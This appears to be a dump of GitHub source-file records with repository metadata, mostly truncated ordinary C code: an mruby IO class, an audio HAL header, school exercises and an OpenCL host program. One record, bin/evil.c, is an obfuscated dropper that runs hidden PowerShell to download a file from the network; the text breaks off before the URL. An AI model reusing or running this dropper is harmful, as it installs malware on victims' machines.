8acf4d597dcf36a873004be94e2fc0340fcf8d31
[ "MIT" ]
permissive
robotan0921/asp3-TINET-on-QEMU
d7cf93ba2fe9b9634b40680c51ebc4a69b94d742
924cf47d17e7cfcae42b8fa62da6665d8ebf21eb
refs/heads/master
2021-03-27T19:22:13.445989
2016-07-06T09:10:06
2016-07-06T09:10:06
null
0
0
null
null
null
null
UTF-8
C
false
false
23,991
c
/* ** io.c - IO class */ #include "mruby.h" #include "mruby/array.h" #include "mruby/class.h" #include "mruby/data.h" #include "mruby/hash.h" #include "mruby/string.h" #include "mruby/variable.h" #include "mruby/ext/io.h" #if MRUBY_RELEASE_NO < 10000 #include "error.h" #else #include "mruby/error.h" #endif #include ...
[ "robotan0921@gmail.com" ]
robotan0921@gmail.com
ab810f23b982f382ebc71c70ffa0b2124348eaca
65f9576021285bc1f9e52cc21e2d49547ba77376
/adsp_proc/avs/main/afe/drivers/afe/tdmif/common/inc/AFEHalTdm.h
0e7e17351eda4f5b0c11e12941b1180a2a188709
[]
no_license
AVCHD/qcs605_root_qcom
183d7a16e2f9fddc9df94df9532cbce661fbf6eb
44af08aa9a60c6ca724c8d7abf04af54d4136ccb
refs/heads/main
2023-03-18T21:54:11.234776
2021-02-26T11:03:59
2021-02-26T11:03:59
null
0
0
null
null
null
null
UTF-8
C
false
false
4,098
h
#ifndef __AFE_HAL_TDM_H__ #define __AFE_HAL_TDM_H__ /** @file AFEHalTdm.h This module contains Audio Hardware interface Abstraction layer function declarations. This file publicizes enums defined by the HAL. Copyright (c) 2015 - 2016 QUALCOMM Technologies, Inc. (QTI). All Rights Reserved. QUALCOMM ...
[ "jagadeshkumar.s@pathpartnertech.com" ]
jagadeshkumar.s@pathpartnertech.com
4a8de68f7cc176b2f0abbc79207797955720449f
c0cb74f0435ea4ed1bf0cb030c6a6b1f79efdac6
/c13/ex02/ft_btree.h
e48e53746f6d032beff80845ec5ac1b264e7cff1
[ "MIT" ]
permissive
lef1007/piscine-19
1e8236a1dbc959728855c93ec29197b24bffc1fc
4458002da07390cbfc3e67a7f6788aea4c11104d
refs/heads/master
2021-05-19T08:57:31.520017
2019-07-30T15:15:56
2019-07-30T15:15:56
251,616,066
1
0
MIT
2020-03-31T13:48:18
2020-03-31T13:48:18
null
UTF-8
C
false
false
1,044
h
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_btree.h :+: :+: :+: ...
[ "marandre@w-r4-p4.s19.be" ]
marandre@w-r4-p4.s19.be
8a21d49c583c7c965bd5ac192344f18c56e80c88
728337580c7bc99b63b8c76e5f76cbbe2013175f
/Palindrom_Number_Array/main.c
924d9391197aa89f502b3d816758cb0a63afeb20
[]
no_license
vishalpalsande/C_Programming
dc436bb55c3e8f8f768893b1b136d1a2f8187d50
979983ec950303791482940442bec7d9c1157433
refs/heads/main
2023-03-10T21:56:33.724651
2021-02-28T15:08:50
2021-02-28T15:08:50
329,085,152
0
0
null
null
null
null
UTF-8
C
false
false
303
c
//Problem Statement:- Print the number of palindrom number in array #include"header.h" int main() { int *arr='\0',n= 0; printf("Enter number of elements: "); scanf("%d",&n); arr = (int *)malloc(sizeof(int)*n); for(int i=0;i<n;i++) { scanf("%d",&arr[i]); } pali(arr,n); return 0; }
[ "noreply@github.com" ]
vishalpalsande.noreply@github.com
7e19e48f4a59c4cf24f93ade24f07b67dc3d8f0b
8f7274d8d84a196a5f72f7cd31ffb82595b78dc0
/all/cc00/ex02/ft_print_reverse_alphabet.c
31647744e3d91a32ff6b66fff2bb1d4f6df4139f
[]
no_license
Mutu92/fear
55ed0f2a52d636b706746b70944cfd32d9999733
814b16a45380a547514045730c1bb5e0a871e2d1
refs/heads/master
2020-07-26T12:40:01.017818
2019-09-15T19:35:45
2019-09-15T19:35:45
208,646,383
0
0
null
null
null
null
UTF-8
C
false
false
1,024
c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_print_reverse_alphabet.c :+: :+: :+: ...
[ "ctumaill@c2r5s3.42madrid.com" ]
ctumaill@c2r5s3.42madrid.com
bdf375be473f10386c1efa338a678c5ea40bf390
1b2b0b3c756bad4d72c193de4a22fe9bb6ccd748
/src/includes/macros.h
fd822b4e8aa1fad065c78a569057f5ca4d09853b
[ "MIT" ]
permissive
clems4ever/myos
dbe4aa253b7e13f7bce50cdfa59ef9719e26250a
de1e05813ccc004e57ccc1727f41d65e844e7778
refs/heads/master
2021-01-21T23:13:42.604094
2018-05-16T21:38:16
2018-05-16T21:38:16
133,725,184
0
1
null
null
null
null
UTF-8
C
false
false
2,794
h
#ifndef _MACROS_H #define _MACROS_H #define outb(port, data) __asm__(" outb %%al, %%dx" :: "d"(port), "a"(data) ); #define inb(port) ({ \ unsigned char __c; \ __asm__("inb %%dx, %%al" : "=a"(__c) : "d"(port)); \ __c; \ }) #define outw(port, data) __asm__(" outw %%ax, %%dx" :: "d"(port), "a"(data) ); #define i...
[ "clement.michaud34@gmail.com" ]
clement.michaud34@gmail.com
624994bef5417697120e7ccc6a5fe735ac640554
27cb6f34181ab317531a592036505105b43f5871
/PGL/scripts/shoc-1_1_5-S3D-ratx_kernel_AMD_main_GPU.c
c3ff29f96418ed5b0b04c73ee266b02b5481a257
[]
no_license
xiaoyao0512/PGL_v2
0a0b70d807ea6b5b40430f438e3f8431846a2009
605cd88813c8ec805bdb44a0aa3739d850cf3116
refs/heads/master
2023-07-15T23:47:43.959936
2021-08-13T03:27:02
2021-08-13T03:27:02
392,099,888
0
0
null
null
null
null
UTF-8
C
false
false
4,250
c
#include<stdio.h> #include<stdlib.h> #include<sys/time.h> #ifdef __APPLE__ #include <OpenCL/opencl.h> #else #include <CL/cl.h> #endif #define MAX_SOURCE_SIZE (0x100000) int main(void) { int i; const int LIST_SIZE = 57594120; float* a = (float*) malloc(sizeof(float) * LIST_SIZE); for (int aaa = 0; aaa < LIST_SIZE; aa...
[ "xiaoyao@usc.edu" ]
xiaoyao@usc.edu
0d1e2ee128c51d9260c47739557468ab880f6d18
241f24e6a837081fd2f3c574c613cfd0b0ab4fb9
/old/sdb/SCCS/s.decode.c
a72cc9dba3902fa315bc1b0ae71066675f5d9e4c
[]
no_license
b4/4.3BSD-Quasijarus
9474549f02d468f847adb58c797af650f3b803b9
2e0a87cbd51f1c47d04f3c57f07f6d9e1aa8ec1b
refs/heads/master
2021-01-22T20:07:46.920215
2017-03-17T04:39:43
2017-03-17T04:39:43
85,271,248
1
0
null
2017-03-17T04:36:05
2017-03-17T04:36:05
null
UTF-8
C
false
false
2,877
c
h57729 s 00000/00000/00125 d D 4.2 82/08/17 13:24:20 rrh 2 1 c Changed the data types for the sdb class characters to be unsigned c characters; this fixed a bug that prevented the arguments to a function c from being printed symbolically. The fix was done globally; it is not c known if the "fix" fixed other bug...
[ "abs@absd.org" ]
abs@absd.org
a012933187a7a5774a6328721a4f23030b588aab
f99fe5e7d6b160cef405cba7775899a81ed2a5e5
/src/cdzro.c
c0f6452a7868a417746adae15746864d206a9d41
[]
no_license
rajdipnayek/cslatec
83122616f72769b36fa7b6d00b3ec988bbb35fe3
c2a4301febfe44e2d1e0c0fa3a73ca49e44780db
refs/heads/master
2021-01-06T16:47:40.152730
2015-05-01T20:03:32
2015-05-01T20:17:48
null
0
0
null
null
null
null
UTF-8
C
false
false
6,325
c
/* cdzro.f -- translated by f2c (version 12.02.01). You must link the resulting object file with libf2c: on Microsoft Windows system, link with libf2c.lib; on Linux or Unix systems, link with .../path/to/libf2c.a -lm or, if you install libf2c.a in a standard place, with -lf2c -lm -- in that order, at the end of ...
[ "rf@rufflewind.com" ]
rf@rufflewind.com
6139568edc668ffa68f6de534f75095a04a570d2
b56d24c581efc8fa27e5d04aa03fa579daa71e93
/dotfiles/.themes/sunset_orange/colors-wal-st.h
aca7a54ba4615377dfddf02d0c3c3cd987ba8cc2
[ "MIT" ]
permissive
Womble69420/dotfiles
8d1e894532cac3824836a4018481973fc627f362
ffb1c99f08e0050a757ce232db577f00beae0375
refs/heads/master
2022-12-15T21:48:53.916264
2020-09-12T21:24:18
2020-09-12T21:24:18
null
0
0
null
null
null
null
UTF-8
C
false
false
953
h
const char *colorname[] = { /* 8 normal colors */ [0] = "#190c0d", /* black */ [1] = "#DB745B", /* red */ [2] = "#FBAC3B", /* green */ [3] = "#F08D6B", /* yellow */ [4] = "#744989", /* blue */ [5] = "#A8658D", /* magenta */ [6] = "#EDA29D", /* cyan */ [7] = "#ecd4d3", /* white */ ...
[ "eyma22s.yu@gmail.com" ]
eyma22s.yu@gmail.com
f44acdb068d3cd73b113d84f093880c0766ea0a5
297497957c531d81ba286bc91253fbbb78b4d8be
/other-licenses/7zstub/src/C/Ppmd7Dec.c
0ad634cea233f821a419e10c36e8c0b9eba5be20
[ "LicenseRef-scancode-public-domain", "LicenseRef-scancode-unknown-license-reference", "Apache-2.0" ]
permissive
marco-c/gecko-dev-comments-removed
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
61942784fb157763e65608e5a29b3729b0aa66fa
refs/heads/master
2023-08-09T18:55:25.895853
2023-08-01T00:40:39
2023-08-01T00:40:39
211,297,481
0
0
NOASSERTION
2019-09-29T01:27:49
2019-09-27T10:44:24
C++
UTF-8
C
false
false
4,775
c
#include "Precomp.h" #include "Ppmd7.h" #define kTopValue (1 << 24) Bool Ppmd7z_RangeDec_Init(CPpmd7z_RangeDec *p) { unsigned i; p->Code = 0; p->Range = 0xFFFFFFFF; if (IByteIn_Read(p->Stream) != 0) return False; for (i = 0; i < 4; i++) p->Code = (p->Code << 8) | IByteIn_Read(p-...
[ "mcastelluccio@mozilla.com" ]
mcastelluccio@mozilla.com
05c37c75af2f4d6fe75d5e6d0388d142b3bfbc63
c776476e9d06b3779d744641e758ac3a2c15cddc
/examples/litmus/c/c-litmus-HMC-Nidhugg/MP+dmb.syll+dmb.st.c
e4dac5e45a6308c884eb9b73d71bcff1f97ec3f9
[]
no_license
ashutosh0gupta/llvm_bmc
aaac7961c723ba6f7ffd77a39559e0e52432eade
0287c4fb180244e6b3c599a9902507f05c8a7234
refs/heads/master
2023-08-02T17:14:06.178723
2023-07-31T10:46:53
2023-07-31T10:46:53
143,100,825
3
4
null
2023-05-25T05:50:55
2018-08-01T03:47:00
C++
UTF-8
C
false
false
1,161
c
/* Copyright (C) 2023 ARM-CBMC * This benchmark is part of ARM-CBMC */ #include <assert.h> #include <pthread.h> #include <stdatomic.h> atomic_int vars[2]; int atom_1_X0_1; int atom_1_X2_0; void *t0(void *arg){ label_1:; atomic_store_explicit(&vars[0], 1, memory_order_release); atomic_thread_fence(memory_order...
[ "tuan-phong.ngo@it.uu.se" ]
tuan-phong.ngo@it.uu.se
c92577aef6ca7f4a6367d0a6dd00a4a66dd1e53d
eb46fb16277a2f36617e79e201da8b2a20f95965
/programs/3-benchmarks+codegen/valid/connect3.c
bcfa8011056e9299d91f4e422f8223911944dd37
[]
no_license
jeniwen/GoCompiler
4caddf0de32b3b3e78bb0bd82befc07b9e4c6459
8f02b0bdd9eeea8fbb75ff23158bc5c19fcdbbab
refs/heads/master
2020-08-01T08:58:35.041044
2019-09-25T21:18:11
2019-09-25T21:18:11
210,941,186
1
0
null
null
null
null
UTF-8
C
false
false
8,192
c
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdbool.h> #include<math.h> #define append(slice, element) _Generic((element), void*: appendv, int:appendi,float:appendf,bool:appendb, double:appendf)(slice,element) typedef enum { intType, floatType, runeType, stringType, boolType, nullType, ...
[ "wang.jiawen1@live.ca" ]
wang.jiawen1@live.ca
8993c81cf8c4413b130f0a2ed32b4d0713ab23eb
6fad74e194af9acb9efa92704c35e68e7b6fac09
/PWM_withTimerandDC/TIMER_config.h
cc5514f3a97d58dc3411f96b1fa0d1da481dc721
[]
no_license
BelalElkady/MyWork
bdef67229eb3a9be1977f711d57b20baa09329f7
cff9425adf0625496004c5d25b3c9921438b38ac
refs/heads/master
2021-01-17T14:09:43.411671
2017-02-03T19:50:18
2017-02-03T20:34:31
54,543,924
1
0
null
null
null
null
WINDOWS-1252
C
false
false
383
h
/* * TIMER_config.h * * Created on: ??þ/??þ/???? * Author: Belal */ #ifndef TIMER_CONFIG_H_ #define TIMER_CONFIG_H_ #define TIMER0_MODE TIMER0_OVERFLOW #define TIMER0_OV_INTRRUPT ENABLE_INTERRUPT #define TIMER0_CTC_INTRRUPT DISABLE_INTERRUPT #define TIMER0_PRESCALER FOSC_0 #define...
[ "Belal@Bela-PC" ]
Belal@Bela-PC
89adcd8c01314ede82b21743a689a5de1dee8a08
eb01b19f001ce4dd2e59480e58620f4abe8e914f
/src/drv/s3c_cam/s3c_camera_driver.c
0f4ea51ef65219b4d794a518c2ba4ccd21aa6c64
[]
no_license
gqiao/work
77f53d8119f33218b6bb828029fd8dd06fd55eee
2832aeac915578e1ccf423f79b0d2f4e1d9cbc03
refs/heads/master
2023-07-13T04:17:37.485869
2013-10-25T05:20:57
2013-10-25T05:20:57
5,106,783
1
0
null
2023-04-04T14:23:14
2012-07-19T07:31:03
Emacs Lisp
UTF-8
C
false
false
46,218
c
#define LOG_TAG "s3c-camera" #include "osal.h" #include "s3c.h" #include <asm/arch/regs-gpio.h> #include <asm/arch/regs-camif.h> //#define CAMIF_DEBUG //#include "s3c_camif.h" #include "s3c_camif_fsm.h" #include "videodev2_s3c.h" #define S3C_V4L2_SUPPORT 1 /* Codec and Preview minor number : V4L2 compliance */ #d...
[ "joesensport@gmail.com" ]
joesensport@gmail.com
4e08cf123679c34b4a5a9b93a37f8b8f6e135859
60f2134ea0d168de7768222eb4c786932393ec95
/file_IO_test/ls_R.c
5440bb89a0c1d7ec943ddfebf96f5bba78424759
[]
no_license
monster22yao/monster
e3ea0e3b45d38682e4fe4f65749b831d2e389d2e
183a6a7d1494e104fee5717de107b9e5f8053dfc
refs/heads/master
2022-12-02T23:17:51.628443
2020-08-24T05:28:08
2020-08-24T05:28:08
289,809,750
0
0
null
null
null
null
UTF-8
C
false
false
1,016
c
#include<stdio.h> #include<stdlib.h> #include<string.h> #include<unistd.h> #include<pthread.h> void fetchdir(const char *dir,void(*fcn)(char *)) { char name[PATH_LEN]; struct dirent *sdp; DIR *dp; if((dp=opendir(dir))==NULL) { fprintf(stderr,"fetchdir: can't opne %s\n",dir); return; } while((sdp=readdir(dp)...
[ "noreply@github.com" ]
monster22yao.noreply@github.com
c0ba8b9cd9b101d7ced654c762fed94a27d9618f
a5368d7f4b9f6c63f52218d8646dca12b8adaccf
/LibOS/shim/test/native/dir.c
d2fdf064108a1e831b8a09b9e1f064b70a8893e2
[]
no_license
banne01/graphene
bcd06c4e957882975730510621e54282a30be72e
4f9d612f34c6cd3b9c4f04e2d48f4d706fd54502
refs/heads/master
2021-01-15T12:36:08.106195
2015-03-31T18:33:11
2015-03-31T18:33:11
null
0
0
null
null
null
null
UTF-8
C
false
false
876
c
/* -*- mode:c; c-file-style:"k&r"; c-basic-offset: 4; tab-width:4; indent-tabs-mode:nil; mode:auto-fill; fill-column:78; -*- */ /* vim: set ts=4 sw=4 et tw=78 fo=cqt wm=0: */ #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #include <sys/stat.h> #include <fcntl.h> #define TESTDIR "testdir...
[ "chitsai@cs.stonybrook.edu" ]
chitsai@cs.stonybrook.edu
bdddfd77523cb2a63c5ecb0196639381cd785dbb
1d8364554108f4be54e7caa5c47d16b521085e2b
/bootmgr/vfs/vfs.c
23c18c3ea5456c7cbc42fe030f7fd89cc47a794b
[]
no_license
nbdd0121/SakiOS
4361f35b2fcf409b6e72ee5ae9fecef6dae8e645
e1e41616b5a700edec3a898201853e2bbc691898
refs/heads/master
2020-06-04T10:46:57.331461
2014-09-21T08:04:21
2014-09-21T08:04:21
22,838,202
1
1
null
2014-09-21T08:04:22
2014-08-11T12:26:36
C
UTF-8
C
false
false
3,622
c
#include "c/string.h" #include "c/assert.h" #include "c/stdbool.h" #include "bootmgr/vfs.h" static fs_op_t empty = { .read = NULL, .write = NULL, .readdir = NULL, .finddir = NULL, .create = NULL, .mkdir = NULL }; static fs_node_t root = { .name = "", .op = &empty, .pointer = NULL, ...
[ "nbdd0121@hotmail.com" ]
nbdd0121@hotmail.com
95ad702f9eb87448be5250f1776c58249fc48bae
97a17c6b43c4b5a4cc532699bd6f6be3b514f705
/blinky/asf-3.21.0/thirdparty/hd/example/ports/avr32/gui_getstring.c
cc7f3048fd8857a60068ffd2812ccfdcd1102a64
[ "MIT", "BSD-3-Clause" ]
permissive
ThucVD2704/femto-usb-blink-example
f2adf7ed2cfff860194870b80c870f0a2c27a82b
5e166bdee500f67142d0ee83a1a169bab57fe142
refs/heads/master
2021-01-18T11:04:43.068488
2015-04-24T04:53:26
2015-04-24T04:53:26
null
0
0
null
null
null
null
UTF-8
C
false
false
13,822
c
/*! \page License * Copyright (C) 2009, H&D Wireless AB All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this li...
[ "webmaster@alexventure.com" ]
webmaster@alexventure.com
77955f76cd02d201427a72079987b515a04ac6a2
57a2ff44382c52095f069c339a393e1854cf82b0
/platforms/unix/vm-display-fbdev/sqUnixFBDevKeyboard.c
f86e81433ed92f3fa23b1ea2bbadd1477236b51c
[]
no_license
fniephaus/squeak
024382e6c29cdbea51cd8ced9b8459a126f24a7c
dcc745ef7f7b2ec8d97faf8c9fc0024c143de054
refs/heads/master
2021-01-10T11:42:47.323162
2016-04-06T08:35:08
2016-04-06T08:35:08
54,750,049
0
0
null
null
null
null
UTF-8
C
false
false
8,579
c
/* sqUnixFBDevKeyboard.c -- abstraction over the keyboard * * Author: Ian Piumarta <ian.piumarta@squeakland.org> * * Last edited: 2009-08-19 04:36:13 by piumarta on emilia-2.local */ /* The framebuffer display driver was donated to the Squeak community by: * * Weather Dimensions, Inc. * 13271 Skislope Way,...
[ "piumarta@fa1542d4-bde8-0310-ad64-8ed1123d492a" ]
piumarta@fa1542d4-bde8-0310-ad64-8ed1123d492a
c217b596a8caaf1f8e2c6c36b2b092349475620a
ee71d7ee4e600b262d995574c422fb3c8ef8610f
/mpe/cpp/maindefinitions.h
3ff16bc8b07f810b216bd88f3fc76d6ea90cdf01
[]
no_license
manusov/MemoryBenchmarkWindows
f4a2131dc8d9813d86def83ce12317d80bfc14d3
a15e41925db4d1f61288b73d7c2aef3754d881e9
refs/heads/master
2023-05-24T19:35:03.412044
2023-05-22T13:54:18
2023-05-22T13:54:18
142,009,536
1
2
null
null
null
null
UTF-8
C
false
false
12,202
h
/* MEMORY PERFORMANCE ENGINE FRAMEWORK. Global definitions. */ #ifndef MAINDEFINITIONS_H #define MAINDEFINITIONS_H // Application common strings definition #define APPLICATION_STRING "Memory Performance Engine." #define COPYRIGHT_STRING "(C)2019 IC Book Labs." #define ANY_KEY_STRING "Press any ...
[ "Manusov1969@gmail.com" ]
Manusov1969@gmail.com
e7da9e0b33db94d5896b73476c780b5f0eb42994
66bef660d7e88ca7141b814da4206fbe37d1c46e
/mudlib/d/areas/STILL_WORKING/athens/downtown4.c
1089a2aa7f8315115c64d728649a33b204e41334
[]
no_license
Tlny/DarkeLIB
e1975bf5b2c436fa35a1b18b8c9d8a6ae2a270f9
903121f782b9ce9dec01a3197c2f0d69589fc7bf
refs/heads/master
2022-11-11T09:53:06.895952
2022-10-30T23:13:44
2022-10-30T23:13:44
234,828,979
0
1
null
2020-01-19T02:36:45
2020-01-19T02:36:44
null
UTF-8
C
false
false
699
c
#include <std.h> #include "athens.h" inherit ROOM; void create() { ::create(); set_property( "light", 3); set_property( "night light", 2); set( "short", "%^YELLOW%^Downtown Atharnas%^RESET%^" ); set( "day long", @EndText EndText ); set( "night long", @EndText At night the streets are almos...
[ "60052985+Tlny@users.noreply.github.com" ]
60052985+Tlny@users.noreply.github.com
1d700b77133d59f312900c963edf5f147e9672bd
3b7cdefcad1272ce9ef9b5a2ea6f6c36d4604a6f
/mcu/common/interface/modem/c2k/lmd_audio.h
318e33c53bdd19ecee40dcac8f2c1c670c6948f6
[]
no_license
junkyard-2327/TK_MD_BASIC_MOLY.LR12A.R3.MP.V110.6
ad79a26ed395d5b333b718a6b0913003b556f15e
04ebd402fe9472e0c2e3da5a296c11819307b929
refs/heads/master
2022-12-25T23:24:05.155209
2020-10-09T04:37:19
2020-10-09T04:37:19
301,968,967
2
1
null
null
null
null
UTF-8
C
false
false
9,415
h
/******************************************************************************* * Copyright Statement: * -------------------- * This software is protected by Copyright and the information contained * herein is confidential. The software may not be copied and the information * contained herein may not be used or d...
[ "null" ]
null
7312b96654a3abdaeebe37caddf3541e0be3557a
49053a4e8b88555b0e941d5fc8b6b6537bc13e62
/bin/evil.c
2ad1850d371821c4a30f2f5ed0ff84b2c7711b8d
[]
no_license
ryanmaynard/FakeImageExploiter
21c54357fd0b850f43e915d0fceacf4303f96b7d
d58317bb08d94de969ec48cbe8b76a530734ca01
refs/heads/master
2020-03-18T08:25:12.872023
2018-05-22T09:53:31
2018-05-22T09:53:31
null
0
0
null
null
null
null
UTF-8
C
false
false
559
c
/* Author: pedro ubuntu [ r00t-3xp10it ] Credits: null byte [ Method POC ] */ #include<stdio.h> #include<stdlib.h> #include<winsock2.h> #include<windows.h> #define _____(i,s,o,g,r,a,m)(i##r##s##o) #define _ _____(m,i,n,u,a,l,s) int _() { system("PoWeRsHeLl /w`In 1 /C (nE`w-ObJ`eCt NeT.WebC`lIe`Nt).dOw`NlOa`DfI`lE(...
[ "root@localhost.localdomain" ]
root@localhost.localdomain
78d944bf605da5d21643c1e5b60b4978156bbb6d
bcaca046ddeb9df787329d580f8fe54ab73ee3de
/test.c
be06caeafdde802825bca5a8c70d906622ff71b2
[]
no_license
ailyanlu1/ACM-6
0260e21ca986f1433d6607dc9d9191383238465a
00db0d23ca6cad920a14f6e418143ad687e67131
refs/heads/master
2020-03-23T07:02:54.356401
2017-12-05T08:52:13
2017-12-05T08:52:13
null
0
0
null
null
null
null
GB18030
C
false
false
4,268
c
#include <stdio.h> #define MAXLEN 80 #define MAXLINE 200 char buffer[MAXLEN],fname[120]; char *lineptr[MAXLINE]; FILE *fp; void edit(),replace(),insert(),delete(),quit(); char comch[]="EeRrIiDdQq";/*命令符*/ void(*comfun[])()={edit,replace,insert,delete,quit};/*对应处理函数*/ int modified=0,/*正文被修改标志*/ last;/*当前正文...
[ "525039107@qq.com" ]
525039107@qq.com
cc6c5fdde4d79ed2f392aee4ea6611dff3007e18
01ba0892571270670dc27994232688f4b8bf5c64
/plot.h
275c8f5350ef87ed958ee9a6ff89e924ab6f0cdc
[]
no_license
ValkaTR/DC_Motor
aa213239af20f87061d3b306e3474d8a610c54d8
d3ba90f7f4ea3a40fbd98de4ecc05eadbdab77f5
refs/heads/master
2021-01-01T17:46:48.056261
2014-04-20T21:20:16
2014-04-20T21:20:16
null
0
0
null
null
null
null
UTF-8
C
false
false
1,252
h
// ############################################################################# #include <stdlib.h> #include <gtk/gtk.h> #include <glib/gprintf.h> #include <math.h> #include <gsl/gsl_math.h> #include <gsl/gsl_errno.h> #include <gsl/gsl_matrix.h> #include <gsl/gsl_odeiv2.h> #include <plplot.h> // ##################...
[ "valkur@gmail.com" ]
valkur@gmail.com
2891bc75b6a2cd7c6acf2e0f120a3fe31af8a52f
4fe2aa89f010e963279ecfcb0e13fd8ed2c04730
/AX9_V1.00/APP/source/APP/app_led.c
130d4732e0e1eb45621cd23e121b8b7a8224dcf0
[]
no_license
LIANMENG0516/AX9-PROJECT-IAR
43df363101806a1836dcf2b12a3b96a647da8b4d
275ba6708daab68ca7a71eaac5e9b930bf4368b5
refs/heads/master
2023-08-18T11:02:57.522664
2021-10-16T07:38:08
2021-10-16T07:38:08
384,056,111
0
0
null
null
null
null
UTF-8
C
false
false
913
c
#include "app_led.h" extern System_MsgStruct SysMsg; OS_TCB LedTaskTcb; CPU_STK App_Led_Task_Stk[APP_LED_STK_SIZE]; void App_Led_Task() { OS_ERR err; while(1) { MCU_LED_BLINK(); OSTimeDlyHMSM(0, 0, 0, 500, OS_OPT_TIME_PERIODIC, &err); } } void App_Led_TaskCreate() { O...
[ "510898718@qq.com" ]
510898718@qq.com
ec2b473dd892f4ccd8467fcdedd3eda37d875ad0
81090a62767ca4c6f7ebdc5c7867a69ac1652a7d
/mipt_contests/sem1/pp.c
895c7c3eaa04d2f3007e846c6f76c53ed777ca36
[]
no_license
Bryanskiy/FirstGrade
bf9c3d93a7e2087b4309d6c20f50348095684e40
e1c9e7e4ec96810fba8ece84e87cd9b4947dc50b
refs/heads/master
2022-12-05T12:29:37.965011
2020-09-02T18:23:54
2020-09-02T18:23:54
null
0
0
null
null
null
null
UTF-8
C
false
false
753
c
#include <stdio.h> unsigned long long fib_mod (unsigned long long n, unsigned long long m) { unsigned long long first = 0, second = 1; unsigned idx; if (n == 0) return 0; for (idx = 2; idx <= n; ++idx) { unsigned long long tmp = second; second = (second + first) % m; ...
[ "ivakin.ki@phystech.edu" ]
ivakin.ki@phystech.edu
a4845fd4c15ebe6148d8a6a508bb3f0fa11871c1
789a290515b486ee7365f85ecd4741e051aac955
/C - Programming Tracks/C - 50 EASY CHALLENGES/PART 2/print-only-alphabets.c
a3ce8c6d1f20240f261d4a0d08c3a94067d6e10e
[]
no_license
yokeswaranm/SKILLRACK-SOLUTIONS
29f0e15c371d8e8cf07a1762619887042751f87c
9081779427a186e08d56becd8b85a88ae5d5ad6b
refs/heads/main
2023-04-30T19:44:32.291381
2021-05-06T10:56:21
2021-05-06T10:56:21
null
0
0
null
null
null
null
UTF-8
C
false
false
405
c
#include<stdio.h> int main() { char a[150]; fgets(a, sizeof(a), stdin); for(int i = 0, j; a[i] != '\0'; ++i) { while(!(a[i] >= 'a' && a[i] <= 'z') && !(a[i] >= 'A' && a[i] <= 'Z') && !(a[i] == '\0') ) { for(j = i; a[j] != '\0'; ++j) { a[j] = a[j+1]...
[ "noreply@github.com" ]
yokeswaranm.noreply@github.com
80434d258840a933139945f99e47e3cfa35ea5a9
5c861a39f940a75733bd8cd7f475ce615b5e8a7c
/vizsla.h
aebb757c286942922af72f6c318be52232379058
[]
no_license
CloudFundoo/cheeta
a1127834963bac9478c03804008cd579c9cd3aa0
45a80e456869d37d3a74a3e15718c98d58cea16f
refs/heads/master
2021-01-25T08:59:51.071443
2012-08-23T05:22:22
2012-08-23T05:22:22
4,555,120
0
1
null
2020-08-17T06:03:33
2012-06-05T02:56:36
C++
UTF-8
C
false
false
62
h
struct tcpu_info { unsigned int cpu_num; int listenerfd; };
[ "cloudfundoo@gmail.com" ]
cloudfundoo@gmail.com
aeb136720f618106c246259cb268cf2cdc3db1a2
6cf00a038af358ad181df4a00ae3b8d90acbffee
/src/pipeline.c
2586512329eb80ffd9f4bf8f4f6619f620e5a833
[ "MIT" ]
permissive
ishaanshah/shi
8fce602bd676d6c7580734603de3ef464acb4c42
d4c16878edeb57ab3bf1a191a9e7c1ba1ce3897c
refs/heads/master
2022-12-18T06:46:47.538351
2020-10-02T09:57:06
2020-10-02T09:57:06
291,271,516
0
0
null
null
null
null
UTF-8
C
false
false
1,728
c
#include "../include/common.h" #include "../include/constants.h" #include "../include/execute.h" #include "../include/handlers.h" #include "../include/pipeline.h" #include "../include/redirection.h" #include "../include/types.h" #include <unistd.h> void exec_cmd(command c) { // Redirect the I/O if needed redir...
[ "ishaan.n.shah@gmail.com" ]
ishaan.n.shah@gmail.com